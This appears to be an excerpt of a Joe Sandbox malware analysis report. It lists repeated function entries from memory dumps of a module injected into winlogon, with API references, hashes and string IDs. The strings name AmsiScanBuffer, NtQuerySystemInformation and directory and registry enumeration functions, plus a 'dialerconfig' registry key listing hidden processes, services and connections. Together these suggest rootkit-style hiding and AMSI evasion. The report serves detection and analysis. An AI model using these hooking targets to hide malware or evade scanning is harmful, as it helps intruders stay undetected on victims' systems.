• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 2135414181-2879589442
• Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
• Instruction ID: 6f5e9873abe6b859c859981dc7bb1a2d7ad2eb1f0a69fd75e1d6ad85cbe13365
• Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
• Instruction Fuzzy Hash: C9713F7A310E21A5EB10DFA9E89879D33B4FB84B8AF409512DE4E47BA9DF38C444C745

                                                                  Control-flow Graph

APIs
• GetCurrentThread.KERNEL32 ref: 00000225DC671D4B
  • Part of subcall function 00000225DC6720C4: GetModuleHandleA.KERNEL32(?,?,?,00000225DC671D7D), ref: 00000225DC6720DC
  • Part of subcall function 00000225DC6720C4: GetProcAddress.KERNEL32(?,?,?,00000225DC671D7D), ref: 00000225DC6720ED
  • Part of subcall function 00000225DC675F60: GetCurrentThreadId.KERNEL32 ref: 00000225DC675F9B
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
• API String ID: 4175298099-4225371247
• Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
• Instruction ID: 7d9e9410253057828c97164bbf76050dc552e1cbcff0ece76988849bd7b629c7
• Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
• Instruction Fuzzy Hash: A84184AC100D6BF0EA06EFDDE85DAD42325BB40B46F80CA13D5195B5F5AE78868EC361

Control-flow Graph

APIs
• GetCurrentThread.KERNEL32 ref: 00000225DC641D4B
  • Part of subcall function 00000225DC6420C4: GetModuleHandleA.KERNEL32(?,?,?,00000225DC641D7D), ref: 00000225DC6420DC
  • Part of subcall function 00000225DC6420C4: GetProcAddress.KERNEL32(?,?,?,00000225DC641D7D), ref: 00000225DC6420ED
  • Part of subcall function 00000225DC645F60: GetCurrentThreadId.KERNEL32 ref: 00000225DC645F9B
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
• API String ID: 4175298099-4225371247
• Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
• Instruction ID: fb1bb4444b8dde758afb32b5cfceb91b3a49fcd79a0ac272923c45658421d9c1
• Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
• Instruction Fuzzy Hash: D041ECAC118DAAB0EB0ADFDDE9596D43365B740B4BFA0C093951A031B5AF78C28DC351

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
• Instruction ID: 741972622163cab60b3485e42464ebd315fc6a01a3b4811f7fd075501a189d4f
• Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
• Instruction Fuzzy Hash: 0C515076200F9496E754CFAAE44C35AB7A1FB88F9AF448125DB4A07B99DF3CC059C701

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
• Instruction ID: 58d8987738939347865e893f24a470ae572fca13a5e588c09a8a4faeb700f7ff
• Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
• Instruction Fuzzy Hash: 49514176214F9496E764CFAAE44C36AB7A1F788F9AF148124DE4A07758DF3CC049CB00
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID: destructor'$ned$restrict(
• API String ID: 190073905-924718728
• Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
• Instruction ID: 9a5e6bad34697a349fda0213b2663d6fdd038587db02b0e830b2026ac901264e
• Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
• Instruction Fuzzy Hash: 1181266D616F71AAFF60DBED984D35962D0EBA5787F04C025AB0943796EF38C846CB00
APIs
• GetLastError.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D267
• FlsGetValue.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D27C
• FlsSetValue.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D29D
• FlsSetValue.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D2CA
• FlsSetValue.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D2DB
• FlsSetValue.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D2EC
• SetLastError.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D307
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D33D
• FlsSetValue.KERNEL32(?,?,00000001,00000225DC67F0FC,?,?,?,?,00000225DC67C3CF,?,?,?,?,?,00000225DC677EE0), ref: 00000225DC67D35C
  • Part of subcall function 00000225DC67DAFC: HeapAlloc.KERNEL32(?,?,00000000,00000225DC67D432,?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67DB51
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D384
  • Part of subcall function 00000225DC67DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC67643A), ref: 00000225DC67DB8A
  • Part of subcall function 00000225DC67DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC67643A), ref: 00000225DC67DB94
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D395
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D3A6
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
• Instruction ID: 9a6a97e40900111dbf4723c648f89434ea414971c8025d7e99afb3788b85548f
• Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
• Instruction Fuzzy Hash: 83419F2C309E64B2FE58A7FD595D76D22425F857F2F24CF24AA360AED6DE38C446C201
APIs
• GetLastError.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D267
• FlsGetValue.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D27C
• FlsSetValue.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D29D
• FlsSetValue.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D2CA
• FlsSetValue.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D2DB
• FlsSetValue.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D2EC
• SetLastError.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D307
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D33D
• FlsSetValue.KERNEL32(?,?,00000001,00000225DC64F0FC,?,?,?,?,00000225DC64C3CF,?,?,?,?,?,00000225DC647EE0), ref: 00000225DC64D35C
  • Part of subcall function 00000225DC64DAFC: HeapAlloc.KERNEL32(?,?,00000000,00000225DC64D432,?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64DB51
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D384
  • Part of subcall function 00000225DC64DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC64643A), ref: 00000225DC64DB8A
  • Part of subcall function 00000225DC64DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC64643A), ref: 00000225DC64DB94
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D395
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D3A6
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
• Instruction ID: 2b824970acb9dcbc4bff42bd92427c46f6650ee6e29246732c69fdfdc3e33568
• Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
• Instruction Fuzzy Hash: F641BE2CB0DE64B2FE59A3FE945D36A32425B467B2F14C7A4AA37467C6DE38C481C201
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Running Time
• API String ID: 1943346504-1805530042
• Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
• Instruction ID: 586c3592aade3638f7f9e5f03ce644c723cfb96d9d5ac5cf597b2c80badf19fa
• Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
• Instruction Fuzzy Hash: F4319526600F60E7F710CFAAA80C759A3A0FB88F96F5485359F4947AA5DF38C455C740
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Running Time
• API String ID: 1943346504-1805530042
• Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
• Instruction ID: c52f9be0bf70ea3b7a5bf3996fbcc68945e9821ba3be50fd257b62d70a75478f
• Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
• Instruction Fuzzy Hash: FC31C526618E64A6F760DFEAA80C359B3A0F798F97F5482259E4943B64DF38C055C740
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Utilization Percentage
• API String ID: 1943346504-3507739905
• Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
• Instruction ID: d0907001e34247cac9d8e3e066ca62c72457a451ffc66ac22ab6a61c28d5a96a
• Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
• Instruction Fuzzy Hash: A431DD79610F61AAF750CFAAA84C759B3A0FB84F82F5485349F8A47BA5DF38C445C300
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                  • API String ID: 1943346504-3507739905
                                                                  • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction ID: 454cdb5cc7f902d6dfd55ac9d910808eab48d9914d8cbcf09632d57ceb8e022e
                                                                  • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction Fuzzy Hash: 91318B69628F65E6F750DFAAA84CB69B3A0FB84F86F1481359E8A43724DF38D445C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction ID: 0cdbf3a16c64a1338def181915019ab7a22a83db87a69e377a0e486a60e7a651
                                                                  • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction Fuzzy Hash: FDE1B23A600F50AAEB20DFA9D54839D37E4F745B8AF209916EE8957FDACB34C581C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction ID: 91cf044dcba0e316c6a94bb843b20a49ec537f1a727c8145e8dbf45d5273eacd
                                                                  • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction Fuzzy Hash: C7E1D53A605F509AEF20DFA9D48939D77A0F745B9BF208115EF8957B9ACB34C581C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction ID: f382be736c8d4d53ce86f08bc3e444f2ccae0d56357efb965fd686541566202e
                                                                  • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction Fuzzy Hash: A1E1B37A60CF50AAFB60DFADD44839D37A4F745B8AF208155EE8A57B9ACB34C581C700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: c897da882854f9e3d26ad73f1ae6e241e834036224319f424e95c785e8117246
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: AD41E729311E20B1FB16CBAEA90CB5523A1FB49BE1F54CA25AD0D8BBC4EF38C445D341
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: 2d334986c2a34472e8b33a964f8069c2c6fc284977a90c17ab4222e0943c1c6f
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: FE41D32931DE20B5FB16CBEEA80875533A1FB45BA2F198129AD0F8B784EF38C445D301
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
